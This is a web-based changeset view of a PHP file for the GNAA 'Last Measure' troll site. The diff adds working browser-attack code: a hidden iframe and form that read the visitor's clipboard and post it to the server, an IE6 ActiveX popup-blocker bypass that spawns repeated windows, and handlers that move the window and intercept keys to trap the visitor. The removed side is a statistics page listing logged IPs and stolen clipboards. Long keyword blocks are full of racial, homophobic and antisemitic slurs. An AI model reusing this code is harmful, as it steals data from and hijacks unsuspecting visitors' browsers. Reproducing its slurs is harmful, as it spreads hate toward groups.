Changeset 245 for trollforge/lastmeasure
- Timestamp:
- 11/08/06 07:07:37 (7 years ago)
- File:
-
- 1 edited
-
trollforge/lastmeasure/index.php (modified) (1 diff)
Legend:
- Unmodified
- Added
- Removed
-
trollforge/lastmeasure/index.php
r244 r245 1 1 <?php 2 include('../include/db.php'); 3 include('../include/tooltips.php'); 4 5 function print_cell($text, $full, $href) { 6 if($href && preg_match('/(http:\/\/[^ ]*)/i', $full, $matches)) { 7 $url = $matches[0]; 8 tooltip($text, $full, $url); 2 include('include/browser.php'); 3 include('include/db.php'); 4 5 /* Browser features */ 6 $br = new Browser; 7 $br_ie6 = ($br->Name == "MSIE" && $br->Version >= 6); 8 9 /* Print a random image name, with its 'image/' prefix. */ 10 $imagelist = array(); 11 $dh = opendir('images/'); 12 while(($file = readdir($dh)) != false) { 13 $ext = substr($file, -3); 14 if($ext == 'jpg' || $ext == 'gif') { 15 $imagelist[] = $file; 16 } 17 } 18 closedir($dh); 19 20 /* Print a random audio file name, with its 'audio/' prefix. */ 21 $audiolist = array(); 22 $dh = opendir('audio/'); 23 while(($file = readdir($dh)) != false) { 24 $ext = substr($file, -3); 25 if($ext == 'wav') { 26 $audiolist[] = $file; 27 } 28 } 29 closedir($dh); 30 31 function random_image() { 32 global $imagelist; 33 echo 'images/'.$imagelist[rand(0,count($imagelist)-1)]; 34 } 35 36 37 function hey_everybody() { ?> 38 <div> 39 <!-- This object plays the "hey everybody, I'm watching gay porno!" sound --> 40 <object classid= "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1" id="hey"> 41 <param name="movie" value="flash/hey.swf" /> 42 <param name="quality" value="high" /> 43 </object> 44 <script type="text/javascript"> 45 <!-- 46 var audio = new Array(); 47 <?php 48 global $audiolist; 49 echo "var audiocount = ".count($audiolist).";\n"; 50 for($i = 0; $i < count($audiolist); $i++) { 51 echo " audio[".$i."] = 'audio/".$audiolist[$i]."';\n"; 52 } ?> 53 for (i = 0; i < audiocount; i++) { 54 setTimeout('document.getElementById("audio").innerHTML += \'<embed src="' + audio[i] + '" loop="true" />\';', 6000 * (i/2)); 55 } 56 // --> 57 </script> 58 <div id="audio"></div> 59 <applet code="LastCoffee.class" width="100" height="100" codebase="/" /> 60 </div> 61 <?php 62 } 63 64 function move_around($w, $h) { ?> 65 <script type="text/javascript"> 66 <!-- 67 var images = new Array(); 68 <?php 69 global $imagelist; 70 echo "var imagecount = ".count($imagelist).";\n"; 71 for($i = 0; $i < count($imagelist); $i++) { 72 echo " images[".$i."] = 'images/".$imagelist[$i]."';\n"; 73 } ?> 74 75 var delay = 10; 76 var step = .2; 77 var curstep = 0; 78 79 window.resizeTo(<?php echo "$w, $h";?>); 80 var centerX = (self.screen.width - document.body.clientWidth) / 2; 81 var centerY = (self.screen.height - document.body.clientHeight - 120) / 2; 82 movew0w(); 83 84 function movew0w() { 85 var j; 86 for (j = 0; j < 5; j++) { 87 curstep += step / 5; 88 var factorX = Math.sin(curstep * 6.1) * 0.9; 89 var factorY = Math.cos(curstep * 3.7) * 0.9; 90 91 factorX += 0.2 * Math.sin((20*Math.sin(curstep/20))+j*70) 92 * (Math.sin(10+curstep/(10+j))+0.2) 93 * Math.cos((curstep + j*25)/10); 94 factorY += 0.2 * Math.cos((20*Math.sin(curstep/(20+j)))+j*70) 95 * (Math.sin(10+curstep/10)+0.2) 96 * Math.cos((curstep + j*25)/10); 97 self.moveTo(centerX * (1.0 + factorX), centerY * (1.0 + factorY)); 98 } 99 document.body.background = images[(Math.floor(curstep) % imagecount) + 1]; 100 setTimeout("movew0w()", delay); 101 } 102 // --> 103 </script> 104 <?php 105 } 106 107 function popup_bypasser() { ?> 108 <!-- This chunk bypasses popups --> 109 <script type="text/javascript"> 110 <!-- 111 function shellscript() { 112 for(i = 0; i < 5; i++) { 113 open('http://<?php echo $_SERVER['SERVER_NAME'];?>/index.php?popup=1','_blank','scrollbar=no'); 114 } 115 } 116 117 function main() { 118 x.DOM.Script.execScript(shellscript.toString()); 119 x.DOM.Script.setTimeout("shellscript()"); 120 setTimeout("main()", 200); 121 } 122 // --> 123 </script> 124 <?php 125 } 126 127 function divert_onload() { ?> 128 <script type="text/javascript"> 129 <!-- 130 var SymRealOnLoad; 131 var SymRealOnUnload; 132 var SymRealWinOpen; 133 134 function SymOnUnload() { 135 window.open = SymWinOpen; 136 if(SymRealOnUnload != null) 137 SymRealOnUnload(); 138 } 139 140 function SymOnLoad() { 141 if(SymRealOnLoad != null) 142 SymRealOnLoad(); 143 window.open = SymRealWinOpen; 144 SymRealOnUnload = window.onUnload; 145 window.onUnload = SymOnUnload; 146 } 147 148 SymRealOnLoad = window.onLoad; 149 window.onLoad = SymOnLoad; 150 // --> 151 </script> 152 <?php 153 } 154 155 function activate_applets() { ?> 156 <div> 157 <object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" height="1" width="1"> 158 <param name="ActivateApplets" value="1" /> 159 <param name="ActivateActiveXControls" value="1" /> 160 </object> 161 </div> 162 <?php 163 } 164 165 /* 166 * The rest of our code 167 */ 168 169 ?> 170 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 171 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 172 <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> 173 <head> 174 <title>GNAA Last Measure Live!</title> 175 <meta name="keywords" content="bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays fucking linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop fuck your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library fuck george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers"> 176 <script type="text/javascript"> 177 <?php include("include/js.inc") ?> 178 </script> 179 <link rel="icon" type="image/x-icon" href="favicon.ico" /> 180 <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" /> 181 <style type="text/css"> 182 html { 183 height: 100%; 184 width: 100%; 185 overflow: hidden; 186 } 187 body { 188 height: 100%; 189 width: 100%; 190 margin: 0; 191 padding: 0; 192 } 193 </style> 194 </head> 195 <?php 196 197 /* 198 * 199 * Clipboard stealing subwindow 200 * 201 */ 202 203 if($_GET['steal']) { ?> 204 <body> 205 <?php if($_POST['pwnd']) { 206 store_clipboard($_GET['key'], $_POST['content']); 207 } else { 208 ?> 209 <form name="clip" method="post" action="/index.php?steal=1&key=<?php echo $_GET['key']; ?>" style="display:none"> 210 <input type="text" name="content"> 211 <input type="hidden" name="pwnd" value="1"> 212 <input type="submit"> 213 </form> 214 <script type="text/javascript"> 215 <!-- 216 // without this if statement check, it bombs out with an error 217 if (typeof clipboardData != 'undefined') { 218 var content = clipboardData.getData("Text"); 219 document.forms["clip"].elements["content"].value = content; 220 } 221 document.forms["clip"].submit(); 222 // --> 223 </script> 224 <?php } ?> 225 </body> 226 227 <?php 228 229 /* 230 * 231 * This is either the first window or a popup window 232 * 233 */ 234 9 235 } else { 10 tooltip($text, $full, ''); 11 } 12 } 13 14 function cut($str, $count) { 15 $l = strlen($str); 16 if($l >= $count) { 17 $n = $count / 2; 18 $s1 = trim(substr($str, 0, $n)); 19 $s2 = trim(substr($str, $l - $n)); 20 $str = "$s1...$s2"; 21 } 22 $str = htmlspecialchars($str); 23 $str = str_replace(" ", " ", $str); 24 return $str; 25 } 26 27 function print_hits() { 28 $id = dba_open($_SERVER['DOCUMENT_ROOT'].'/db/hit.db', 'w', 'db4'); 29 if(!$id) { 30 ?><tr><td colspan="6" class="error">Failed to open database!</td></tr><?php 31 return; 32 } 33 $key = dba_firstkey($id); 34 if($key == false) { 35 ?><tr><td colspan="6" class="error">No hits found!</td></tr><?php 36 return; 37 } 38 for($l = 0; $l < 20 && $key != false; $l++) { 39 $val = dba_fetch($key, $id); 40 list($ip, $port, $host, $uagent, 41 $referer, $user, $clipboard) = explode(' ', $val); 42 $date = key2date($key); 43 ?> 44 <tr style="background-color: <?php echo ($l % 2) ? '#cef' : '#ecf'; ?>"> 45 <td> 46 <?php print_cell(date('H:i:s', $date), date('D, d M Y H:i:s', $date), false); ?> 47 </td> 48 <td> 49 <?php if($host == '') { 50 $host = gethostbyaddr($ip); 51 $host = gethostbyaddr($ip); 52 $val = "$ip $port $host $uagent $referer $user $clipboard"; 53 dba_replace($key, $val, $id); 54 } 55 if($host != '') { 56 print_cell("$ip", "$host $port", false); 57 } else { 58 print_cell("$ip", "$ip $port", false); 59 } ?> 60 </td> 61 <td> 62 <?php $uagent = base64_decode($uagent); 63 if(strlen($uagent) > 30) { 64 print_cell(cut($uagent, 25), htmlspecialchars($uagent), false); 65 } else { 66 echo htmlspecialchars($uagent); 67 } ?> 68 </td> 69 <td> 70 <?php $referer = base64_decode($referer); 71 if(strlen($referer) > 35) { 72 print_cell(cut($referer, 30), htmlspecialchars($referer), true); 73 } else { 74 echo '<a href="'.htmlspecialchars($referer).'">'.htmlspecialchars($referer).'</a>'; 75 } ?> 76 </td> 77 <td> 78 <?php 79 $user = base64_decode($user); 80 echo htmlspecialchars($user); 81 ?> 82 </td> 83 <td> 84 <?php $clipboard = base64_decode($clipboard); 85 print_cell(cut($clipboard, 40), htmlspecialchars($clipboard), true); ?> 86 </td> 87 </tr><?php 88 $key = dba_nextkey($id); 89 } 90 dba_close($id); 91 } 92 93 function toplist($title, $table, $count) { 94 $id = dba_open($table, 'r', 'db4'); 95 if(!$id) { 96 ?><tr><td colspan="2" class="error">Failed to open database!</td></tr><?php 97 return; 98 } 99 $key = dba_firstkey($id); 100 if($key == false) { 101 ?><tr><td colspan="2" class="error">No hits found!</td></tr><?php 102 return; 103 } 104 $items = array(); 105 $total = 0; 106 $smallest = 0; 107 while($key != false) { 108 $total++; 109 $val = dba_fetch($key, $id); 110 if(count($items) == $count) { 111 /* Our list is already full; if the new entry is big 112 * enough, add it, sort the list and remove the last item. */ 113 if($val > $smallest) { 114 $items[$key] = $val; 115 arsort($items); 116 array_pop($items); 117 $smallest = $items[$count - 1]; 118 } 119 } else { 120 /* Our list is not complete yet. Just add an item. */ 121 $items[$key] = $val; 122 } 123 $key = dba_nextkey($id); 124 } 125 arsort($items); 126 if($count > $total) $count = $total; 127 $l = 0; ?> 128 <table style="border: solid black 1px; margin: 5px;"> 129 <tr style="background-color: #8af;"> 130 <td><?php echo $title;?> (<?php echo "$count of $total";?>)</td> 131 <td>Count</td> 132 </tr> <?php 133 foreach($items as $key => $val) { ?> 134 <tr style="background-color: <?php echo ($l % 2) ? '#cef' : '#ecf'; ?>"> 135 <td><?php echo base64_decode($key); ?></td> 136 <td><?php echo $val; ?></td> 137 </tr><?php 138 $l++; 139 } ?> 140 </table><?php 141 dba_close($id); 142 } 143 236 if($_GET['popup']) { 237 $flash = 'second_opener.swf'; 238 } else { 239 $key = store_hit(); 240 $flash = 'first_opener.swf'; 241 } 242 ?> 243 <body style="background-image: url(<?php random_image(); ?>); background-color: #FFFFFF;" 244 onload="load_goatse();document.goatse.reset();movew0w();setTimeout('ruin()', 20);<?php if($br_ie6) { ?>setTimeout('main()', 100);<?php } ?>" 245 onmousemove="document.goatse.reset();movew0w();procreate();" 246 onkeydown="altf4key();ctrlkey();delkey();procreate();" 247 onunload="document.goatse.reset();movew0w();procreate();" 248 onmouseover="document.goatse.reset();movew0w();procreate();"> 249 <?php move_around(800, 600); 250 activate_applets(); 251 if($br_ie6) { 252 popup_bypasser(); 253 divert_onload(); 254 } ?> 255 <table> 256 <tr> 257 <td valign="middle"> 258 <div style="text-align: center;"> 259 <a href="http://www.gnaa.us/"><img src="gnaa.png" alt="GNAA" /></a> 260 <br /> 261 <br /> 262 <?php if(!$br_ie6) { ?> 263 <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"> 264 <param name="movie" value="flash/<?php echo $flash;?>" /> 265 <param name="quality" value="high" /> 266 </object> 267 <?php } ?> 268 </div> 269 </td> 270 </tr> 271 </table> 272 <?php if(!$_GET['popup']) { 273 hey_everybody(); ?> 274 <div> 275 <iframe style="width: 1px; height: 1px;" src="/index.php?steal=1&key=<?php echo $key;?>"></iframe> 276 <iframe style="width: 1px; height: 1px;" src="lm.pdf"></iframe> 277 <iframe style="width: 1px; height: 1px;" src="jews.wmv"></iframe> 278 <br /> 279 bsd digg gay gnaa internet last measure linux nigger slashdot freebsd niger internet providers internet service providers nigga gays niggers openbsd internet access cable internet xandros netbsd gai gay sex gay personals bds gaysex enternet dial up internet cable internet service lunix internets gay black men internet services cheap internet service gay chat rooms internet fax service insmod gey internet radio dial up internet access international internet gay massage inux gay movies gay com gayboy internet business internet businesses homosex internet college internet banking schwul internet gambling neger homosexuales internet poker internet filtering satellite internet connection internet roaming gay cock broadband internet access gay adoption asian gay gay bears gay guys linux on windows internet connection schwule gej maryland internet linux recovery gay sites michigan internet remote internet access making money on the internet gay pornography gay hardcore internet speed up atlanta gay internet game older gay men gay nudist gay shopping gay san francisco houston internet california internet nigga stole my bike gay houston gay marriage gay bear internet auctions internet worldwide linux laptops redhat9 internet billing broadband internet linux drivers linux pc gay amsterdam gay seattle gay bdsm selling on the internet mature gay men internet call gay sex chat internet marketing gay toys internet printing linux help freebsd ports mobile internet linux for windows linux clustering gay chat teen gay porn ny gay alabama gay freebsd 6.0 linux os spain internet clips gay hairy gay men gay leather make money on the internet gay boy gay philadelphia gay community internet via satellite freebsd 6 gay cartoons gay love nigga lyrics niger uranium internet search gay news hate niggers gay georgia oral gay sex linux downloads communication internet niger africa bds suspension gay nude boys linux applications gay pics enternet 300 internet censorship internet information server gay australia redhat linux gay niggers niger forgeries gay phoenix gay orgies internet sites aspergillus niger internet traffic oracle linux gays fucking linux support test internet internet messaging gay vivo horny gay the internets niger forgery bds marketing freebsd org sex gay movies internet canada niger yellowcake gay women linux apache the niger river freebsd wireless internet development bodybuilder gay freebsd java can a nigga get a table dance gay latinos deng gai linux penguin realest nigga real nigga roll call linux tutorial japanese gay gays in military freebsd screenshots linux systems linux software freebsd apache joseph wilson niger installing freebsd gay store freebsd update freebsd port freebsd upgrade teen gays install freebsd freebsd cvsup dead niggers cumshot gay ten little niggers gays com freebsd laptop fuck your couch nigga broke nigga internet stock trading niger document jews spics wtc jew jewish holidays jewish calendar jewish community center anti semitism single jews jewish names jewish history jewish museum jewish hospital jewish wedding bernanke jewish us jews jewish music jewish federation barnes jewish russian jews jewish jokes libby jewish jewish singles jewish religion barnes jewish hospital long island jewish jewish people jewish news jewish women ben bernanke jewish jewish girls jewish population world without zionism reform judaism jewish dating jewish food jewish film festival jewish bible jewish porn jewish last names bernanke jew daniel libeskind judaism orthodox jew the world without zionism jewish new year jewish studies jewish heritage jewish quotes jewish humor ben bernanke jew jewish sex long island jewish medical center messianic jewish jewish jewelry jewish calendar 2005 jewish world jewish sayings detroit jewish news judaism beliefs baltimore jewish times jewish vocational services the jewish religion zionism jewish pussy jewish leaders jewish stereotypes jewish slang messianic music reconstructionist judaism jewish board jewish christmas jewish services jewish man jewish t shirts jewish dance heritage civilization and the jews jewish games islam judaism jewish quarter jew who jewish library jewish flag jew reggae jewish community centers wtc ny jewish alphabet wondering jew jewish migration republican jewish coalition messianic prophecies jews in america jewish worship jewish ethics messianic secret jewish bread international jew jewish museum berlin manhattan jewish experience boston jewish film jewish values board of jewish education jewish outreach jewish adoption jewish christians jewish weekly jewish blog women in judaism jewish facts semitic jewish college of nursing messianic jewish dress sephardic persecution christian zionism facts about judaism atlanta jewish jewish gift persecution complex russian jewish black jewish jewish history timeline jewish settlements union of reform judaism jewish homeland woodbury jewish center antisemitism naked jewish women jewish cemetaries republican jewish samuel alito jew judaism com hacidic jew south park jew symbols of judaism jewish recipies jewish association jewish speed dating conversion judaism jewish high holidays jewish religon association for jewish studies jewish libraries jewish tits anti semitic jewish converts jewish dna jewish heroes jewish tattoo jewish text ausmus jewish half jewish jewish fashion allied jewish federation jewish birth christianity judaism islam jewish theology jews and christians jewish restaurants fellowship of christians and jews trump jewish jewish boy names jewish time jewish community center louisville jericho jewish center jewish restaurant jewish naming jewish book council jewish midi libeskind jewish reggae artist jewish greetings barnes jewish west ufo wtc jewish wedding rings association of jewish libraries long island jewish health system temple jewish kingsbrook jewish medical jewish intelligence jewish street jewish nudes jewish family jewish cookies jewish nfl players jewish naming ceremony persecution of homosexuals great persecution jewish writing world jewish digest jesus jew jewish diseases jewish baby gifts christianity judaism and islam jewish wisdom reformed jew borat throw the jew anti semitism in europe jewish educators jewish communal service the jewish diaspora academy for jewish religion 9/11 george bush terrorism george w bush george bush action figure george hw bush talking george bush doll terrorist terrorism training terrorists george bush picture bioterrorism war against terrorism war on terrorism george w bush doll ctu terrorist attacks talking george bush tria president george w bush terrorism articles islam terrorism clinton terrorism gw bush information terrorism article on terrorism george bush quotes terrorist groups terrorism article london bombings george bush dolls chemical terrorism george bush news preparing for terrorism george bush jokes george w bush 2004 george w bush biography terrorism in the middle east terrorism coverage north korea terrorism ctu online george w bush picture terrorism law american terrorism george bush speech president george bush george bush impersonator suicide bombings george bush hates black people george bush jr nuclear terrorism george bush intercontinental george w bush pic understanding terrorism palestinian terrorism george bush funny george bush posters the terrorist counter terrorist george bush dont like black people george w bush for president psychology of terrorism us terrorism george bush sucks george bush library george bush international fight against terrorism george w bush speech george w bush sr george walker bush george w bush speeches impeach george bush george w bush born george w bush election picture of george bush madrid bombings terrorist costume bali bombings george bush games hate george bush george w bush jr biography 24 ctu picture of george w bush george bush cartoon george bush drunk anti terrorist george bush stupid islamic terrorists world trade center bombings bioterrorism preparedness george bush presidential library george w bush birthplace george bush lies george w bush approval rating george w bush head funny george w bush terrorist group terrorist media failure george bush touchtone terrorists george bush andy dick terrorist bombing george w bush presidential library fuck george bush birthplace of george w bush george bush college george bush cheerleader 911 terrorist george w bush approval george bush lyrics church bombings hotel tria george bush flash madrid train bombings stupid george bush quotes tria restaurant george w bush pics wanted terrorists terrorisme terrorist watch about george bush international terrorist george bush doesn t care george bush born george w bush cartoons biography of george bush terrorist alert george bush wav abortion clinic bombings bombings atomic bombings george w busch tria philadelphia bill o reilly is a terrorist sympathizer emergency response to terrorism bush terrorist kanye west george bush video george bush parody george bush pumpkin pattern george bush pumpkin carving terrorist world trade center 911 terrorists george bush war george bush state of the union president george bush turnpike funny george bush videos terrorist hunter george w bush yale george bush freeway kayne west george bush uss george bush george bush polls september 11 terrorist attacks george w bush cabinet terrorist games pics of george bush george bush joke george bush cia george w bush presidency hotel bombings george bush raped margie schoedinger impeach george w bush terrorist act middle east terrorism terrorist hunting permit ctu edu september 11 terrorist terrorist handbook 50 cent george bush george w bush audio recent bombings terrorist definition george w bush cocaine george bush education palestinian terrorist george w bush soundboard george bush 41 iraqi terrorist will farrell george bush george bush resume george bush comedy touch tone terrorist bali terrorism george w bush iraq george w bush quote terrorist countries terrorists in iraq tria markers kanye west and george bush george bush texas george w bush is a george w bush approval ratings number of terrorist attacks george w bush stupid george bush don t like black people video eta terrorist photos of george bush volkswagen terrorist photos of george w bush iraq terrorists george w bush middle name george w bush accomplishments george bush bloopers 280 </div> 281 <?php } ?> 282 <form onreset="procreate();" onsubmit="procreate();" action="#" id="goatse" name="goatse"> 283 <p><span style="background-color: #ffffff; border: thin solid; color: #000000;">GNAA Gay Niggers Timecop</span></p> 284 </form> 285 </body><?php 286 } 144 287 ?> 145 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 146 "http://www.w3.org/TR/xhtml1/DTD/xhtml11.dtd"> 147 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> 148 <head> 149 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 150 <title>GNAA Last Measure Live! Static Statistics</title> 151 <link rel="icon" type="image/x-icon" href="/favicon.ico" /> 152 <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /> 153 <style type="text/css"> 154 body,td { 155 font-family: sans-serif, Verdana, Arial, Helvetica; 156 font-size: 0.9em; 157 } 158 .error { 159 background-color: #ff6666; 160 } 161 <?php tooltip_css(); ?> 162 </style> 163 <script type="text/javascript"> 164 <?php tooltip_js(); ?> 165 </script> 166 </head> 167 <body> 168 169 <h2><span style="background-color: transparent; 170 margin-right: 10px; clear: both;"> 171 <img src="/gnaa.png" width="108" height="40" 172 alt="GNAA" /> 173 </span> GNAA Last Measure Live! Static Statistics | <a href="live.php">Web 2.0 Statistics</a></h2> 174 <div style="float: left;"> 175 <?php toplist('User', $_SERVER['DOCUMENT_ROOT'].'/db/user.db', 40); ?> 176 </div> 177 178 <?php tooltip_finish(); ?> 179 180 <table style="border: solid black 1px; margin: 5px;"> 181 <tr style="background-color: #8af;"> 182 <td>Date</td> 183 <td>Host</td> 184 <td>Browser</td> 185 <td>Referer</td> 186 <td>User</td> 187 <td>Clipboard</td> 188 </tr> 189 <?php print_hits(); ?> 190 </table> 191 192 <?php tooltip_finish(); ?> 193 194 <?php toplist('Browser', $_SERVER['DOCUMENT_ROOT'].'/db/uagent.db', 20); ?> 195 196 <?php tooltip_finish(); ?> 197 198 <hr /> 199 200 <div style="float: right;"> 201 <p> 202 <a href="http://validator.w3.org/check?uri=referer"><img 203 src="http://www.w3.org/Icons/valid-xhtml11" style="border: 0px;" 204 alt="Valid XHTML 1.1" height="31" width="88" /></a> 205 </p> 206 </div> 207 208 <p> Generated by GNAA Last Measure Live! <?php echo date('Y-m-d H:i:s'); ?> </p> 209 210 </body> 288 211 289 </html>
Note: See TracChangeset
for help on using the changeset viewer.
